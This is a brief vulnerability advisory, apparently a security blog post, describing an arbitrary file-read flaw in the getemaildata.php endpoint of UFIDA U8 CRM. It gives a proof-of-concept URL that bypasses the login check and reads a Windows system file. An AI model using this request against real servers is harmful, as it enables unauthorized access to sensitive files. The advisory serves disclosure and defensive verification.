Ufida U8 Crm Customer Relationship Management System Getemaildata Php Arbitrary File Reading Vulnerability
Ufida U8 Crm Customer Relationship Management System Getemaildata Php Arbitrary File Reading Vulnerability
UFIDA U8 CRM customer relationship management system getemaildata.php arbitrary file reading vulnerability
Vulnerability Description
UFIDA U8 CRM customer relationship management system getemaildata.php has an arbitrary file reading vulnerability, and an attacker can obtain sensitive files in the server through the vulnerability.
Vulnerability Impact
UFIDA U8 CRM Customer Relations Management System
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini
This post is licensed under CC BY 4.0 by the author.